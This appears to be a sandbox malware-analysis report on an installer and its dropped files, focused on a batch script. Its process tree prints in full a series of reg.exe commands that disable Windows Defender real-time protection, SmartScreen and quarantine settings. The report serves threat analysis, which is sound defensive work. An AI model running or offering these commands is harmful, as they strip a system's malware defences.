Overview
overview
10Static
static
71310121612...52.exe
windows7-x64
101310121612...52.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_63_/PowerRun64.exe
windows7-x64
4$_63_/PowerRun64.exe
windows10-2004-x64
3$_63_/SetACL64.exe
windows7-x64
1$_63_/SetACL64.exe
windows10-2004-x64
1$_63_/acxx...gr.exe
windows7-x64
3$_63_/acxx...gr.exe
windows10-2004-x64
3$_63_/bn.bat
windows7-x64
1$_63_/bn.bat
windows10-2004-x64
1$_63_/bn1.bat
windows7-x64
10$_63_/bn1.bat
windows10-2004-x64
10$_63_/bnn.bat
windows7-x64
1$_63_/bnn.bat
windows10-2004-x64
1$_63_/bnoo1.bat
windows7-x64
10$_63_/bnoo1.bat
windows10-2004-x64
10$_63_/bnz.bat
windows7-x64
1$_63_/bnz.bat
windows10-2004-x64
1$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/win_...rp.exe
windows7-x64
3$_63_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
16s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 13:57
Behavioral task
behavioral1
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral2
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral7
Sample
$_63_/PowerRun64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral8
Sample
$_63_/PowerRun64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral9
Sample
$_63_/SetACL64.exe
Resource
win7-20241010-en
windows7-x64
Behavioral task
behavioral10
Sample
$_63_/SetACL64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral11
Sample
$_63_/acxxtzcogvgr.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral12
Sample
$_63_/acxxtzcogvgr.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral13
Sample
$_63_/bn.bat
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral14
Sample
$_63_/bn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral15
Sample
$_63_/bn1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral16
Sample
$_63_/bn1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral17
Sample
$_63_/bnn.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral18
Sample
$_63_/bnn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral19
Sample
$_63_/bnoo1.bat
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral20
Sample
$_63_/bnoo1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral21
Sample
$_63_/bnz.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral22
Sample
$_63_/bnz.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral23
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral24
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral25
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win7-20241023-en
windows7-x64
Behavioral task
behavioral26
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral27
Sample
$_63_/win_version_csharp.exe
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral28
Sample
$_63_/win_version_csharp.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
General
-
Target
$_63_/bnoo1.bat
-
Size
2KB
-
MD5
1f89930c9e4fd56765ca2ac17e06817d
-
SHA1
cecb1c4a81dc27a6f4379ead464f418a1bf10ce9
-
SHA256
2de693852c2127d52fe758bde2fa606d3adf5f4eb790f186797abc48e3e892e7
-
SHA512
488f77ba07c40a27c3f76636fba2479146ce6aa0b6a4948677e4cc5a2937eae42f2b15c2bbf13ebb95cf3e2bd0ace5fa525072cb2bcd368571f8fe79eb6fcd1c
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2752 wrote to memory of 3000 2752 cmd.exe 31 PID 2752 wrote to memory of 3000 2752 cmd.exe 31 PID 2752 wrote to memory of 3000 2752 cmd.exe 31 PID 2752 wrote to memory of 3012 2752 cmd.exe 32 PID 2752 wrote to memory of 3012 2752 cmd.exe 32 PID 2752 wrote to memory of 3012 2752 cmd.exe 32 PID 2752 wrote to memory of 2184 2752 cmd.exe 33 PID 2752 wrote to memory of 2184 2752 cmd.exe 33 PID 2752 wrote to memory of 2184 2752 cmd.exe 33 PID 2752 wrote to memory of 3060 2752 cmd.exe 34 PID 2752 wrote to memory of 3060 2752 cmd.exe 34 PID 2752 wrote to memory of 3060 2752 cmd.exe 34 PID 2752 wrote to memory of 2552 2752 cmd.exe 35 PID 2752 wrote to memory of 2552 2752 cmd.exe 35 PID 2752 wrote to memory of 2552 2752 cmd.exe 35 PID 2752 wrote to memory of 2556 2752 cmd.exe 36 PID 2752 wrote to memory of 2556 2752 cmd.exe 36 PID 2752 wrote to memory of 2556 2752 cmd.exe 36 PID 2752 wrote to memory of 2576 2752 cmd.exe 37 PID 2752 wrote to memory of 2576 2752 cmd.exe 37 PID 2752 wrote to memory of 2576 2752 cmd.exe 37 PID 2752 wrote to memory of 2660 2752 cmd.exe 38 PID 2752 wrote to memory of 2660 2752 cmd.exe 38 PID 2752 wrote to memory of 2660 2752 cmd.exe 38 PID 2752 wrote to memory of 2680 2752 cmd.exe 39 PID 2752 wrote to memory of 2680 2752 cmd.exe 39 PID 2752 wrote to memory of 2680 2752 cmd.exe 39 PID 2752 wrote to memory of 2656 2752 cmd.exe 40 PID 2752 wrote to memory of 2656 2752 cmd.exe 40 PID 2752 wrote to memory of 2656 2752 cmd.exe 40 PID 2752 wrote to memory of 2676 2752 cmd.exe 41 PID 2752 wrote to memory of 2676 2752 cmd.exe 41 PID 2752 wrote to memory of 2676 2752 cmd.exe 41 PID 2752 wrote to memory of 2732 2752 cmd.exe 42 PID 2752 wrote to memory of 2732 2752 cmd.exe 42 PID 2752 wrote to memory of 2732 2752 cmd.exe 42 PID 2752 wrote to memory of 2604 2752 cmd.exe 43 PID 2752 wrote to memory of 2604 2752 cmd.exe 43 PID 2752 wrote to memory of 2604 2752 cmd.exe 43 PID 2752 wrote to memory of 2572 2752 cmd.exe 44 PID 2752 wrote to memory of 2572 2752 cmd.exe 44 PID 2752 wrote to memory of 2572 2752 cmd.exe 44 PID 2752 wrote to memory of 2864 2752 cmd.exe 45 PID 2752 wrote to memory of 2864 2752 cmd.exe 45 PID 2752 wrote to memory of 2864 2752 cmd.exe 45 PID 2752 wrote to memory of 2756 2752 cmd.exe 46 PID 2752 wrote to memory of 2756 2752 cmd.exe 46 PID 2752 wrote to memory of 2756 2752 cmd.exe 46 PID 2752 wrote to memory of 2580 2752 cmd.exe 47 PID 2752 wrote to memory of 2580 2752 cmd.exe 47 PID 2752 wrote to memory of 2580 2752 cmd.exe 47 PID 2752 wrote to memory of 2640 2752 cmd.exe 48 PID 2752 wrote to memory of 2640 2752 cmd.exe 48 PID 2752 wrote to memory of 2640 2752 cmd.exe 48 PID 2752 wrote to memory of 3040 2752 cmd.exe 49 PID 2752 wrote to memory of 3040 2752 cmd.exe 49 PID 2752 wrote to memory of 3040 2752 cmd.exe 49 PID 2752 wrote to memory of 2744 2752 cmd.exe 50 PID 2752 wrote to memory of 2744 2752 cmd.exe 50 PID 2752 wrote to memory of 2744 2752 cmd.exe 50 PID 2752 wrote to memory of 2608 2752 cmd.exe 51 PID 2752 wrote to memory of 2608 2752 cmd.exe 51 PID 2752 wrote to memory of 2608 2752 cmd.exe 51 PID 2752 wrote to memory of 2724 2752 cmd.exe 52
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnoo1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:3000
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f2⤵PID:3012
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f2⤵PID:3060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f2⤵PID:2552
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f2⤵PID:2556
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f2⤵PID:2576
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f2⤵PID:2660
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f2⤵PID:2680
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f2⤵PID:2656
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f2⤵PID:2676
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f2⤵PID:2732
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f2⤵PID:2604
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2572
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2756
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2580
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2640
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3040
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2744
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f2⤵PID:2608
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f2⤵PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f2⤵PID:2844
-